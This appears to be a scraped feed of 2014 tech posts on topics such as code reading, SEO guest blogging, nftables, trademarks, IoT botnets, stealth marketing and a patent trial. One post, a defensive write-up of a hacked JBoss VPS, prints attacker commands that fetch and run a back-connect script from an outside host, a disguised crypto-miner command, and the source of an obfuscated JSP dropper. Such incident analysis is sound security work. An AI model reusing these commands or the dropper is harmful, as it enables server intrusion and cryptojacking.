My presentation to the code reading group started with stock backbone.js and then walked through the changes I would make to it to make it, by my lights, more understandable. At one point I asked if people thought we should move on to the group discussion but nobody seemed very interested. Hopefully seeing my refactoring gave people some of the same insights into the underlying structure of the original that I had obtained by doing the refactoring.

The second meeting of the Etsy code reading group featured Avi Bryant demonstrating how to use the code browsing capabilities of Smalltalk to navigate through some code. In that case, because few of the Etsy engineers had any experience with Smalltalk, we had no expectation that folks would read the code in advance. But the presentation was an awesome chance for folks to get exposed to the power of the Smalltalk development environment and for me to heckle Avi about Smalltalk vs Lisp differences.

When I got to Twitter I inexplicably still had the literature seminar model in mind even though neither of the two meetings of the Etsy reading group—which folks seemed to like pretty well—followed that model at all. When I sent out the email inviting Twitter engineers to join a code reading group the response was pretty enthusiastic. The first meeting was, yet again, a presentation of some code, in this case the internals of the Scala implementation of Future that is used throughout Twitter’s many services, presented by Marius Eriksen, who wrote most of it.

It was sometime after that presentation that I finally realized the obvious: code is not literature. We don’t read code, we decode it. We examine it. A piece of code is not literature; it is a specimen. Knuth said something that should have pointed me down this track when I asked him about his own code reading:

Knuth: But it’s really worth it for what it builds in your brain. So how do I do it? There was a machine called the Bunker Ramo 300 and somebody told me that the Fortran compiler for this machine was really amazingly fast, but nobody had any idea why it worked. I got a copy of the source-code listing for it. I didn’t have a manual for the machine, so I wasn’t even sure what the machine language was. But I took it as an interesting challenge. I could figure out BEGIN and then I would start to decode. The operation codes had some two-letter mnemonics and so I could start to figure out “This probably was a load instruction, this probably was a branch.” And I knew it was a Fortran compiler, so at some point it looked at column seven of a card, and that was where it would tell if it was a comment or not. After three hours I had figured out a little bit about the machine. Then I found these big, branching tables. So it was a puzzle and I kept just making little charts like I’m working at a security agency trying to decode a secret code. But I knew it worked and I knew it was a Fortran compiler—it wasn’t encrypted in the sense that it was intentionally obscure; it was only in code because I hadn’t gotten the manual for the machine. Eventually I was able to figure out why this compiler was so fast. Unfortunately it wasn’t because the algorithms were brilliant; it was just because they had used unstructured programming and hand optimized the code to the hilt. It was just basically the way you solve some kind of an unknown puzzle—make tables and charts and get a little more information here and make a hypothesis. In general when I’m reading a technical paper, it’s the same challenge. I’m trying to get into the author’s mind, trying to figure out what the concept is. The more you learn to read other people’s stuff, the more able you are to invent your own in the future, it seems to me.

He’s not describing reading literature; he’s describing a scientific investigation. So now I have a new mode for how people should get get together to gain insights from code which I explained to the Twitter code reading group like this:

Preparing for the talk I’m going to give to the Girls who Code cohort, I started thinking about what to tell them about code reading and code they should read. And once again it struck me that for all the lip service we pay to the idea of reading code, most programmers really don’t read that much code, at least not just for the sake of reading it. As a simple proof: name me one piece of code that you’ve read and that you can be reasonably sure that most other good programmers will have read or will at least have heard of. Not many, right? Probably none. But then it hit me. Code is not literature and we are not readers. Rather, interesting pieces of code are specimens and we are naturalists. So instead of trying to pick out a piece of code and reading it and then discussing it like a bunch of Comp Lit. grad students, I think a better model is for one of us to play the role of a 19th century naturalist returning from a trip to some exotic island to present to the local scientific society a discussion of the crazy beetles they found: “Look at the antenna on this monster! They look incredibly ungainly but the male of the species can use these to kill small frogs in whose carcass the females lay their eggs.” The point of such a presentation is to take a piece of code that the presenter has understood deeply and for them to help the audience understand the core ideas by pointing them out amidst the layers of evolutionary detritus (a.k.a. kluges) that are also part of almost all code. One reasonable approach might be to show the real code and then to show a stripped down reimplementation of just the key bits, kind of like a biologist staining a specimen to make various features easier to discern. The ideal presentation should be aimed at an audience of gentleman and lady programmers—smart, and generally capable but without, necessarily, any specific knowledge of the domain from which the code comes. Presentations should provide enough context for the audience to to understand what the code is and should explain any details of the implementation language that may be obscure to the average programmer.

Since I had my epihany we’ve had several meetings of the code reading group, now known as the Royal Society of Twitter for Improving Coding Knowledge, along the new lines. We’re still learning about the best ways to present code but the model feels very right. Also, I no longer feel bad about my dissection-based approach to reading code.

The biggest lesson so far is that code is very dense. A half hour presentation is just enough time to present maybe a dozen meaty lines of code and one main idea. It is also almost certainly the case that the presenters, who have to actually really dig down into a piece of code, get more out of it than anybody. But it does seem that a good presentation can at least expose people to the main ideas and maybe give them a head start if they do decide to read the code themselves.

The decay and fall of guest blogging for SEO

$
0
0

Comments:"The decay and fall of guest blogging for SEO"

URL:http://www.mattcutts.com/blog/guest-blogging/


Okay, I’m calling it: if you’re using guest blogging as a way to gain links in 2014, you should probably stop. Why? Because over time it’s become a more and more spammy practice, and if you’re doing a lot of guest blogging then you’re hanging out with really bad company.

Back in the day, guest blogging used to be a respectable thing, much like getting a coveted, respected author to write the introduction of your book. It’s not that way any more. Here’s an example unsolicited, spam email that I recently received:

My name is XXXXXXX XXXXXXXX and I work as a content marketer for a high end digital marketing agency in [a city halfway around the world]. I have been promoting high quality content in select niches for our clients. We are always on the lookout for professional, high class sites to further promote our clients and when I came across your blog I was very impressed with the fan following that you have established.I [sic] would love to speak to you regarding the possibility of posting some guest articles on your blog. Should you be open to the idea, we can consider making suitable contribution, befitting to high standard of services that your blog offers to larger audience. On my part, I assure you a high quality article that is- - 100% original - Well written - Relevant to your audience and - Exclusive to you We can also explore including internal links to related articles across your site to help keep your readers engaged with other content on your blog. All I ask in return is a dofollow link or two in the article body that will be relevant to your audience and the article. We understand that you will want to approve the article, and I can assure you that we work with a team of highly talented writers, so we can guarantee that the article would be insightful and professionally written. We aim to write content that will benefit your loyal readers. We are also happy to write on any topic, you suggest for us.

If you ignore the bad spacing and read the parts that I bolded, someone sent me a spam email offering money to get links that pass PageRank. That’s a clear violation of Google’s quality guidelines. Moreover, we’ve been seeing more and more reports of “guest blogging” that are really “paying for PageRank” or worse, “we’ll insert some spammy links on your blog without you realizing it.”

Ultimately, this is why we can’t have nice things in the SEO space: a trend starts out as authentic. Then more and more people pile on until only the barest trace of legitimate behavior remains. We’ve reached the point in the downward spiral where people are hawking “guest post outsourcing” and writing articles about “how to automate guest blogging.”

So stick a fork in it: guest blogging is done; it’s just gotten too spammy. In general I wouldn’t recommend accepting a guest blog post unless you are willing to vouch for someone personally or know them well. Likewise, I wouldn’t recommend relying on guest posting, guest blogging sites, or guest blogging SEO as a linkbuilding strategy.

For historical reference, I’ll list a few videos and links to trace the decline of guest articles. Even back in 2012, I tried to draw a distinction between high-quality guest posts vs. spammier guest blogs:

Unfortunately, a lot of people didn’t seem to hear me say to steer away from low-quality guest blog posting, so I did a follow-up video to warn folks away from spammy guest articles:

In mid-2013, John Mueller gave spot on advice about nofollowing links in guest blog posts. I think by mid-2013, a ton of people saw the clear trend towards guest blogging being overused by a bunch of low-quality, spammy sites.

Then a few months ago, I took a question about how to be a guest blogger without it looking like paying for links (even the question is a clue that guest blog posting has been getting spammier and spammier). I tried to find a sliver of daylight to talk about high-quality guest blog posts, but if you read the transcript you’ll notice that I ended up spending most of the time talking about low-quality/spam guest posting and guest articles.

And then in this video that we posted last month, even the question itself predicted that Google would take stronger action and asked about “guest blogging as spam”:

So there you have it: the decay of a once-authentic way to reach people. Given how spammy it’s become, I’d expect Google’s webspam team to take a pretty dim view of guest blogging going forward.

Added: It seems like most people are getting the spirit of what I was trying to say, but I’ll add a bit more context. I’m not trying to throw the baby out with the bath water. There are still many good reasons to do some guest blogging (exposure, branding, increased reach, community, etc.). Those reasons existed way before Google and they’ll continue into the future. And there are absolutely some fantastic, high-quality guest bloggers out there. I changed the title of this post to make it more clear that I’m talking about guest blogging for search engine optimization (SEO) purposes.

I’m also not talking about multi-author blogs. High-quality multi-author blogs like Boing Boing have been around since the beginning of the web, and they can be compelling, wonderful, and useful.

I just want to highlight that a bunch of low-quality or spam sites have latched on to “guest blogging” as their link-building strategy, and we see a lot more spammy attempts to do guest blogging. Because of that, I’d recommend skepticism (or at least caution) when someone reaches out and offers you a guest blog article.

Agner`s CPU blog - Intel's "cripple AMD" function

Why you will love nftables » To Linux and beyond !

$
0
0

Comments:" Why you will love nftables » To Linux and beyond !"

URL:https://home.regit.org/2014/01/why-you-will-love-nftables/


Linux 3.13 is out

Linux 3.13 is out bringing among other thing the first official release of nftables. nftables is the project that aims to replace the existing {ip,ip6,arp,eb}tables framework aka iptables. nftables version in Linux 3.13 is not yet complete. Some important features are missing and will be introduced in the following Linux versions. It is already usable in most cases but a complete support (read nftables at a better level than iptables) should be available in Linux 3.15.

nftables comes with a new command line tool named nft. nft is the successor of iptables and derivatives (ip6tables, arptables). And it has a completely different syntax. Yes, if you are used to iptables, that’s a shock. But there is a compatibility layer that allow you to use iptables even if filtering is done with nftables in kernel.

There is only really few documentation available for now. You can find my nftables quick howto and there is some other initiatives that should be made public soon.

Some command line examples

Multiple targets on one line

Suppose you want to log and drop a packet with iptables, you had to write two rules. One for drop and one for logging:

iptables -A FORWARD -p tcp --dport 22 -j LOG
iptables -A FORWARD -p tcp --dport 22 -j DROP

With nft, you can combined both targets:

nft add rule filter forward tcp dport 22 log drop
Easy set creation

Suppose you want to allow packets for different ports and allow different icmpv6 types. With iptables, you need to use something like:

ip6tables -A INPUT -p tcp -m multiport --dports 23,80,443 -j ACCEPT
ip6tables -A INPUT -p icmpv6 --icmpv6-type neighbor-solicitation -j ACCEPT
ip6tables -A INPUT -p icmpv6 --icmpv6-type echo-request -j ACCEPT
ip6tables -A INPUT -p icmpv6 --icmpv6-type router-advertisement -j ACCEPT
ip6tables -A INPUT -p icmpv6 --icmpv6-type neighbor-advertisement -j ACCEPT

With nft, sets can be use on any element in a rule:

nft add rule ip6 filter tcp dport {telnet, http, https} accept
nft add rule filter input icmpv6 type { nd-neighbor-solicit, echo-request, nd-router-advert, nd-neighbor-advert } accept

It is easier to write and it is more efficient on filtering side as there is only one rule added for each protocol.

You can also use named set to be able to make them evolve other time:

# nft -i # use interactive mode
nft> add set global ipv4_ad { type ipv4_address;}
nft> add element global ipv4_ad { 192.168.1.4, 192.168.1.5 }
nft> add rule ip global filter ip saddr @ipv4_ad drop
And later when a new bad boy is detected:
# nft -i
nft> add element global ipv4_ad { 192.168.3.4 }
Mapping

One advanced feature of nftables is mapping. It is possible to use to different type of data and to link them. For example, we can associate iface and a dedicated rule set (stored in a chain and created before). In the example, the chains are named low_sec and high_sec:

# nft -i
nft> add map filter jump_map { type ifindex => verdict; }
nft> add element filter jump_map { eth0 => jump low_sec; }
nft> add element filter jump_map { eth1 => jump high_sec; }
nft> add rule filter input meta iif vmap @jump_map

Now, let’s say you have a new dynamic interface ppp1, it is easy to setup filtering for it. Simply add it in the jump_map mapping:

nft> add element filter jump_map { ppp1 => jump low_sec; }

On administration and kernel side

More speed at update

Adding a rule in iptables was getting dramatically slower with the number of rules and that’s explained why script using iptables call are taking a long time to complete. This is not anymore with nftables which is using atomic and fast operation to update rule sets.

Less kernel update

With iptables, each match or target was requiring a kernel module. So, you had to recompile kernel in case you forgot something or want to use something new. this is not anymore the case with nftables. In nftables, most work is done in userspace and kernel only knows some basic instruction (filtering is implemented in a pseudo-state machine). For example, icmpv6 support has been achieved via a simple patch of the nft tool. This type of modification in iptables would have required kernel and iptables upgrade.

King has trademarked the word CANDY (and you're probably infringing) | Gamezebo

$
0
0

Comments:"King has trademarked the word CANDY (and you're probably infringing) | Gamezebo"

URL:http://www.gamezebo.com/news/2014/01/20/king-has-trademarked-word-candy-and-youre-probably-infringing


When you have an intellectual property – especially one that’s worth millions of dollars – you want to protect it. But can such protections ever go too far? That’s the question a lot of industry watchers are asking this morning, as developers far and wide whose games include the word ‘candy’ are getting emails from Apple on behalf of King, the makers of Candy Crush Saga.

In a filing with the US trademark office dated February 6, 2013, King.com Limited registered claim to the word ‘candy’ as it pertains to video games and, strangely, clothing. On January 15, 2014 the filing was approved. And now, a mere five days later, reports are coming in from developers that they’re being asked to remove their app (or prove that their game doesn’t infringe upon the trademark).

“Lots of devs are frustrated cause it seems so ridiculous” says Benny Hsu, the maker of All Candy Casino Slots – Jewel Craze Connect: Big Blast Mania Land. Benny’s game, which shares no similarities with King’s properties aside from the word ‘candy,’ is one of a number of games that have been targeted by King.

 

 

Hsu contacted Sophie Hallstrom, King’s IP paralegal, to discuss the matter further. Rather than the simple “oops, our mistake” that Benny was hoping for, he was given a very finite response. “Your use of CANDY SLOTS in your app icon uses our CANDY trade mark exactly, for identical goods, which amounts to trade mark infringement and is likely to lead to consumer confusion and damage to our brand,” reads Hallstrom’s reply. “The addition of only the descriptive term "SLOTS" does nothing to lessen the likelihood of confusion.” 

So how does a word like ‘candy’ get trademarked? According to Martin Schwimmer, a partner at the IP legal firm Leeson Ellis (and the man behind The Trademark Blog), it’s all about how strong a connection the claimant has to that mark when it comes to a particular good or service. Think of Apple, for example. Nobody is going to expect the electronics giant to lay claim over the fruit, but if someone were to try to market an electronic device under that name, you’d better believe their lawyers would swoop in.

So the question then, is whether or not there’s a strong enough connection between the word ‘candy’ and video games as it pertains to Candy Crush Saga. According to the US Trademark Office, the answer is a bona fide yes.

Still, holding a trademark and being able to enforce it are entirely different things. Schwimmer is quick to point out the difference between suggestive marks and unique ones. “Someone can't plausibly claim that they came up with the term TEENAGE MUTANT NINJA TURTLES on their own.  An incredibly unique trademark like that is somewhat easy to protect.” But something generic – a dictionary word like candy? That can be a lot trickier.

 

Benny Hsu's All Candy Casino Slots

 

“Suggestive marks are protectable, but the problem is that third parties can claim that they thought up their mark on their own.” And in the case of something as generic as ‘candy,’ it doesn’t seem that farfetched to think that a lot of developers may have.

“As to how far King can enforce its rights, it will be a function of how strong its mark has become, and how similar the third party name is.  It would likely be able to enforce its rights against marks that are connotatively, phonetically or visually similar, for games that are conceivably competitive,” Schwimmer tells us. “King can't go after candy companies because candy companies don't use the term CANDY as a trademark – they use it to identify their product.”

If you’re a developer who has received one of these letters from King, Schwimmer’s advice is simple: call a lawyer. “A trademark lawyer can be very useful in obtaining a coexistence agreement.  Often a trademark owner will accept a settlement in which the possibility of confusion is mitigated, perhaps because the developer will not expand into areas more directly competitive with the trademark owner.”

But in an App Store littered with small indie developers, this is an option that seems out of reach for developers like Benny Hsu. “Myself and other indie developers don't have the money or resources to fight back… I plan on changing the name if that is what I must do.”

With Apple seemingly complicit in King’s claims – the letter Tsu initially received came through the iTunes legal department – one can’t help but wonder what the future of the App Store and suggestive trademarks might be.

“Last year I learned I couldn't use the word MEMORY because it was trademarked,” said Hsu. “Now I wonder what other common words will be trademarked in the App Store.”

Read more:Candy Crush Saga, King, copyright


Kids, this is story of How I Met... my VPS hacked. | Pedro Rio

$
0
0

Comments:"Kids, this is story of How I Met... my VPS hacked. | Pedro Rio"

URL:http://www.corrspt.com/blog/2014/01/18/tale-vps-hacked/


Hi everyone,

Just recently I published my technical goals for 2014 and one of them was to learn more about security. Well it couldn’t have been more appropriate, my VPS just got hacked, for the second time (I use the VPS to host a Java web application). The first time, I basically rebuilt my server and hardened security as much as I could, but it didn’t work (more on what I did later). I’m not really a system administrator nor do I have much experience on the matter so I guess I must learn my lessons either studying or by being stung.

My VPS was being used to mine bitcoins, I believe. If you never heard of bitcoins, check Wikipedia

My VPS is configured to send me an email alert when CPU usage is above 90% for more than 2 (two) hours, which was what happened. I received an email by 20.30 last night (Jan, 17 – 2014)

I logged in my VPS and used the top command to find that a single process was using all CPU, this was the culprit:

14915 ?        Ssl  710:07 ./logrotate -o stratum+tcp://bat.minersbest.com:10470 -u apapun.seattle -p x –threads=4 –background

Never heard of something like that, but with a bit of googling I traced it to bitcoin mining.

As I said at the beginning this was the second time my server got hacked (using the same method I believe ), so this time I really had to figure what went wrong as I wasn’t going to do everything from scratch again!

The first time my server was hacked I rebuilt it from scratch with the following steps to increase security:

  • Install a newer CentOS version
  • Update all packages
  • Disable root login via SSH
  • Disable password login via SSH (only private keys)
  • Setup firewall to block all traffic except port 80 (HTTP), 443 (HTTPS) and 22 (SSH)
  • Install Fail2Ban
  • Change the user and root password to even more secure passwords (more than 15 chars each)

I thought I had it covered…

I tried checking the SSH log at /var/log/secure and found that lots of attempts were made to login with different users (with common names like admin, oracle, weblogic, postgres, etc…) but none seemed to have succeeded as I had setup only private key login.

Could it be that someone found a vulnerability in my web application? Oh boy…
I have a setup where Jboss hosts the web application and Apache proxies and handles the SSL stuff.

I went on and checked the Apache access logs (in /var/log/httpd/access_log) around the time the CPU first went off and found something interesting

114.79.12.168 – - [17/Jan/2014:18:15:26 +0000] “GET /a/pwn.jsp?cmd=cat%20/proc/cpuinfo HTTP/1.1″ 200 540 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36″

A GET request to /a/pwn.jsp with a parameter cat /proc/cpuinfo… like this JSP was some kind of a web shell.. and it got a 200 OK response? No way…
Back to the browser to check and surely enough, the server responded with an empty page…  Next check… I try /a/pwn.jsp?cmd=ls and ouch… the directory listed

Ok, so let’s check the full log using the following command (trimmed for readability)

cat /var/log/httpd/acess_log | grep ‘pwn.jsp’ [17/Jan/2014:18:15:26 +0000] “GET /a/pwn.jsp?cmd=cat%20/proc/cpuinfo [17/Jan/2014:18:15:36 +0000] “GET /a/pwn.jsp?cmd=ps%20x [17/Jan/2014:18:15:41 +0000] “GET /a/pwn.jsp?cmd=ls%20-al [17/Jan/2014:18:15:52 +0000] “GET /a/pwn.jsp?cmd=wget%20pdd-nos.info/.tmp/back.conn.txt%20-O%20bd [17/Jan/2014:18:16:05 +0000] “GET /a/pwn.jsp?cmd=perl%20bd%20pdd-nos.info%2011457 [17/Jan/2014:18:17:44 +0000] “GET /a/pwn.jsp?cmd=ps%20x [17/Jan/2014:18:18:23 +0000] “GET /a/pwn.jsp?cmd=ps%20x [17/Jan/2014:18:27:57 +0000] “GET /a/pwn.jsp?cmd=ps%20x

With a little cleaning and url decode, you get the following list of commands:

cat /proc/cpuinfo ps x ls -al wget pdd-nos.info/.tmp/back.conn.txt -O bd perl bd pdd-nos.info 11457 ps x kill 14873 ps x ps x

Interesting to see is that the web shell appears to be just a means to and end, because the wget used in step 4) downloaded something that was used in step 5) by the perl interpreter, I checked the pdd-nos.info link and found what appears to be a some kind of a backdoor shell and I assume this was what was used to launch the bitcoin mining process.

 

Ok, so I have a problem, a big one. And I need to do two things:

I started by searching how someone installed a web shell in my Jboss instance. With a bit of googling I found the following resources (the “pwn.jsp” filename was a really big help there)

Which in turn led me to find an existing vulnerability regarding JBoss’s HTTP Invoker was probably used, that basically means an attacker could trigger a remote code execution. Not nice!

With additional search I found an exploit ready to be used. A PHP script that downloads a .war application which contains the web shell and uses the known vulnerability in the HTTP invoker to deploy the .war.

But wait a minute, where was that logrotate process that was consuming my CPU (cleverly named so that I wouldn’t notice)? If there’s a process then there’s an executable somewhere. I found it right inside my /JBOSS_HOME/bin folder along with a file named jboss4.txt (also named so that I wouldn’t found him suspicious) whose content was

print “Executed”; system(“nohup ./logrotate -o stratum+tcp://bat.minersbest.com:10470 -u apapun.seattle -p x –threads=4 &> logrotate.log”);

Now, the issue is… was there something else that could have been changed so that even if I restarted JBoss it would allow the attacker to execute the same attack again? Hunt time!

Indeed I found that in /JBOSS_HOME/server/INSTANCE/server/deploy/management was a little folder called “lMvcdFxMFrvdib.war” (I kid you not) and inside the folder a file named “ZqxQljMExRpriU.jsp” (again I kid you not).. the content of the JSP was

<%@page import=”java.io.*, java.util.*, sun.misc.BASE64Decoder” %><% String PJdpj = “”; String pIGx = “”; String RSVw = System.getProperty(“jboss.server.home.dir”); if (request.getParameter(“pUBYyDsT”) != null){ try { PJdpj = request.getParameter(“pUBYyDsT”); pIGx = request.getParameter(“oAEICWIo”); byte[] rFPE = new BASE64Decoder().decodeBuffer(PJdpj); String MfNJU = RSVw + “/deploy/” + pIGx + “.war”; FileOutputStream twkH = new FileOutputStream(MfNJU); twkH.write(rFPE); twkH.close(); } catch(Exception e) {} } else { try{ String VBpM = request.getParameter(“oAEICWIo”); String dhkDS = RSVw + “/deploy/” + VBpM + “.war”; new File(dhkDS).delete(); } catch(Exception e) {} }

Although the variable names are obfuscated you can tell that it receives some content encoded as Base64 and then writes that content to a .war file inside JBoss’s deploy directory. Clever trick… if I was to remove the attacker’s original war (the one with pwn.jsp) and restart Jboss, this .war file would also be deployed and provide a clear path of attack again!

So I had to secure the HTTP Invoker and that was the problem. I had the HTTPInvoker and WebConsole deployed and accessible to anyone (big, big mistake), since I don’t need them, I simply removed them, simple enough. Next, to delete the files!

I had to delete the files in JBOSS_HOME/bin which where used to create shell and mine the bitcoins, I had to delete the pwn.jsp that was installed in my JBoss instance and had to delete the war with the crazy name to stop an attacker from deploying another war without my knowledge.

The conclusion is that you can never be to careful with security. Anyone from around the world can try to frak you and you must be very careful. I overlooked the deployment of the web console and HTTP Invoker and I paid for that. Things could have been worse If the attacker found a way to upgrade the privileges of the user running jboss (it’s a sudoer, but the password is really hard) he could have done a lot more damage. I hope I’ve removed the threat but I can’t be 100% sure, so I’ll have to  keep monitoring, but I’ve learned my lesson.

I found a detailed guide explaining the exploit and how it works, in case you want additional information.

Happy coding and be safe!

Additional resources

 

 

Cyber attack that sent 750k malicious emails traced to hacked refrigerator, TVs and home routersSecurity IT

$
0
0

Comments:"Cyber attack that sent 750k malicious emails traced to hacked refrigerator, TVs and home routersSecurity IT"

URL:http://www.theage.com.au/it-pro/security-it/cyber-attack-that-sent-750k-malicious-emails-traced-to-hacked-refrigerator-tvs-and-home-routers-20140120-hv96q.html


At least one refrigerator was used to create a botnet that sent spam. Photo: AFP

Call it the attack of the zombie refrigerators.

Computer security researchers say they have discovered a large "botnet" which infected internet-connected home appliances and then delivered more than 750,000 malicious emails.

The California security firm Proofpoint, which announced its findings, said this may be the first proven "internet of things" based cyber attack involving "smart" appliances.

Proofpoint said hackers managed to penetrate home-networking routers, connected multimedia centres, televisions and at least one refrigerator to create a botnet — or platform to deliver malicious spam or phishing emails from a device, usually without the owner's knowledge.

Security experts previously spoke of such attacks as theoretical.

But Proofpoint said the case "has significant security implications for device owners and enterprise targets" because of massive growth expected in the use of smart and connected devices, from clothing to appliances.

"Proofpoint's findings reveal that cyber criminals have begun to commandeer home routers, smart appliances and other components of the internet of things and transform them into 'thingbots'", to carry out the same kinds of attacks normally associated with personal computers.

The security firm said these appliances may become attractive targets for hackers because they often have less security than PCs or tablets.

Proofpoint said it documented the incidents between December 23 and January 6, which featured "waves of malicious email, typically sent in bursts of 100,000, three times per day, targeting enterprises and individuals worldwide".

More than 25 per cent of the volume was sent by things that were not conventional laptops, desktop computers or mobile devices. No more than 10 emails were initiated from any single device, making the attack difficult to block based on location

"Botnets are already a major security concern and the emergence of thingbots may make the situation much worse," said David Knight at Proofpoint.

"Many of these devices are poorly protected at best and consumers have virtually no way to detect or fix infections when they do occur. Enterprises may find distributed attacks increasing as more and more of these devices come online and attackers find additional ways to exploit them."

AFP

Stealth marketing: Microsoft paying YouTubers for Xbox One mentions | Ars Technica

$
0
0

Comments:"Stealth marketing: Microsoft paying YouTubers for Xbox One mentions | Ars Technica"

URL:http://arstechnica.com/gaming/2014/01/stealth-marketing-microsoft-paying-youtubers-for-xbox-one-mentions/


A leaked image from the campaign e-mail sent to Machinima partners.

The line between traditional, paid advertising and organic editorial content on the Internet can sometimes be hazy. A recent stealth promotional campaign between Microsoft and Machinima highlights just how hazy that line has become, and how behind-the-scenes payments can drive ostensibly independent opinion-mongering on by users on services like YouTube.

This weekend, word started leaking of a new promotion offering Machinima video partners an additional $3 CPM (i.e., $3 per thousand video views) for posting videos featuring Xbox One content. The promotion was advertised by Machinima's UK community manager in a since-deleted tweet, and it also appears on Machinima's activity feed on Poptent, a clearinghouse for these kind of video marketing campaigns. The Poptent page also mentions an earlier campaign surrounding the Xbox One's launch in November, which offered an additional $1 CPM for videos "promoting the Xbox One and its release games."

To qualify for the campaign (and the extra payments), Machinima partners had to post a video including at least 30 seconds of Xbox One game footage that mentioned the Xbox One by name and included the tag "XB1M13." A YouTube search for that relatively unique term turns up "about 6,590 results," but a quick scan of those results shows only a few hundred that actually seem to be tagged for the Machinima promotion.

These kinds of payments aren't inherently suspect in and of themselves. If the video makers disclosed that Microsoft was paying extra for these videos, and if they were allowed to say whatever they wanted in those videos, then the whole thing could be seen as merely an unorthodox way to increase exposure for the Xbox One on YouTube.

That's not the case, however. According to a leaked copy of the full legal agreement behind the promotion, video creators "may not say anything negative or disparaging about Machinima, Xbox One, or any of its Games" and must keep the details of the promotional agreement confidential in order to qualify for payment. In other words, to get the money, video makers have to speak positively (or at least neutrally) about the Xbox One, and they can't say they're being paid to do so.

The arrangement as described might go against the FTC's guidelines for the use of endorsements in advertising, which demand full disclosure when there is "a connection between the endorser and the seller of the advertised product that might materially affect the weight or credibility of the endorsement." The document offers a specific example of a video game blogger who gets a free game system that he later talks about on his blog. That blogger would need to disclose that gift, the FTC says, because his opinion is "disseminated via a form of consumer-generated media in which his relationship to the advertiser is not inherently obvious." That same reasoning would seem to apply to the opinions expressed by the video makers participating in this promotion. Neither Microsoft nor Machinima responded immediately to a request for comment on the matter, but we'll let you know if and when we hear from them.

This kind of guerrilla online video advertising doesn't seem to be a major part of Microsoft's Xbox One marketing plan. According to the Machinima e-mail, Microsoft agreed to pay only for the first 1.25 million views in the promotion, putting the budget paid to video creators at a mere $3,750 (it's unclear if Machinima itself received any additional funds for facilitating the promotion). Poptent lists the campaign, which started on January 14, as "expired on January 16," suggesting that Microsoft has already reached that desired video view goal. That money may be pulling more than its weight, though, as those videos continue to attract additional views that Microsoft doesn't have to pay for directly.

Whatever you think about the practice, there's reason to believe this kind of stealth promotion of "consumer-generated media" is likely to get more popular going forward. As readers and viewers get better at ignoring explicit, traditional ads—or start blocking them entirely with browser-side scripts—marketers are going to continue to try finding new ways to get their message out there through supposedly unbiased content creators. Something to keep in mind the next time you watch a video or read something from someone who says they're just an average, everyday consumer.

Google set to face Intellectual Ventures in landmark patent trial | Reuters

$
0
0

Comments:" Google set to face Intellectual Ventures in landmark patent trial | Reuters "

URL:http://www.reuters.com/article/2014/01/20/us-google-iv-trial-idUSBREA0J0PC20140120


By Dan Levine

SAN FRANCISCOMon Jan 20, 2014 7:13am EST

SAN FRANCISCO (Reuters) - Intellectual Ventures is set to square off this week against Google Inc's Motorola Mobility unit in the first trial that the multibillion-dollar patent-buying firm has undertaken since it was founded.

Privately-held Intellectual Ventures sued Motorola in 2011, claiming the mobile phone maker infringed patents covering a variety of smartphone-related technologies, including Google Play. Motorola has denied the allegations and will now go to trial over three of those patents.

Barring any last-minute settlements, jury selection is scheduled to begin on Tuesday at a federal court in Wilmington, Delaware.

The trial takes place amid an unfolding debate in Congress over patent reform, in which Intellectual Ventures and Google are on opposite sides. Google is backing attempts to curb software patents and make it easier to fight lawsuits, while IV has warned that Congress should not act too rashly to weaken patent owners' rights.

IV and other patent aggregators have faced criticism from some in the technology industry, who argue that patent litigation and royalty payments have become a burdensome tax on innovation. They say firms like IV, which do not primarily make products, are exploiting the patent system.

But IV argues that unlike some of the firms denounced as "patent trolls," it invests only in quality intellectual property and does not file frivolous lawsuits. IV also says it helps inventors get paid for their innovations while helping tech companies protect and manage their intellectual property.

Should the Delaware jury rule against Motorola and uphold IV's patents, it could bolster the firm's argument that it does not buy frivolous patents, said Shubha Ghosh, a University of Wisconsin Law School professor.

Yet a win for Motorola could be held up as evidence that the U.S. government issues too many dubious patents. And even if IV prevails, Google could still argue that patent litigation before a jury of non-expert citizens is akin to a lottery, said Ghosh, who supports patent reform.

"Just because you have a winning ticket doesn't mean it's not still a lottery," he said.

IV and Google both declined to comment on the upcoming trial.

Since its founding in 2000, IV has raised about $6 billion (3.6 billion pounds) from investors and has bought tens of thousands of intellectual property assets from a variety of sources. Google was an investor in IV's first patent acquisition fund, but did not join later vehicles.

IV filed a barrage of lawsuits in 2010 against companies in various sectors, and most defendants have since settled.

THE INVENTORS

Two of the patents in the upcoming Motorola trial cover inventions by Richard Reisman, U.S. government records show. Through his company, Teleshuttle, Reisman has developed several patent portfolios for various technologies, including an online update service, according to the Teleshuttle website.

IV claims that the two Reisman patents cover several of Motorola's older-generation cellphones that have Google Play, a platform for Android smartphone apps. Motorola argues that IV's patents should never have been issued because the inventions were known in the field already.

Reisman did not respond to requests for comment.

One of the patents in play against Motorola has been in a courtroom before. Teleshuttle and a British partner, BTG, sued Microsoft and Apple in 2004 using one of the same patents now in play against Motorola.

In 2006, Teleshuttle and BTG sold their patent rights to Delaware-based Twintech EU LLC for $35 million up front, plus a percentage of future licensing fees, according to BTG's website. At the same time as the sale, BTG and Teleshuttle abruptly withdrew their cases against Apple and Microsoft.

Microsoft and Apple were both early investors in Intellectual Ventures. IV often uses subsidiary companies to buy patents, and then transfer them at a later date to related corporate entities, though public records do not indicate whether IV had an ownership interest in Twintech.

IV took title on the patents from Twintech in September 2011 and sued Motorola a month later, U.S. records show. In a 2011 blog post, Reisman wrote that his deal with IV provided resources "to let me focus on my work as an inventor."

Microsoft declined to comment while Apple did not respond to a request for comment.

Another patent being asserted against Motorola was originally issued to Rajendra Kumar in 2006. Kumar's company, Khyber Technologies, transferred it to Balustare Processing NY LLC in July 2011, which passed it over to IV about a month later, patent records show.

Khyber Technologies was founded in 1991 with the goal of creating the next generation of handheld computing products, according to its website. The patent that IV obtained from Khyber covers detachable handset technology, which IV claims Motorola used in its defunct Lapdock product.

Kumar declined to comment on the IV lawsuit.

If IV wins, damages will be decided at a later proceeding. The trial is expected to last about ten days.

The case in U.S. District Court, District of Delaware is Intellectual Ventures I and Intellectual Ventures II, 11-908.

(Reporting by Dan Levine; editing by Jonathan Weber)

Fezes Are Cool.

$
0
0

Comments:"Fezes Are Cool."

URL:http://isaacbw.com/general/fez/2014/01/20/fezes-are-cool.html


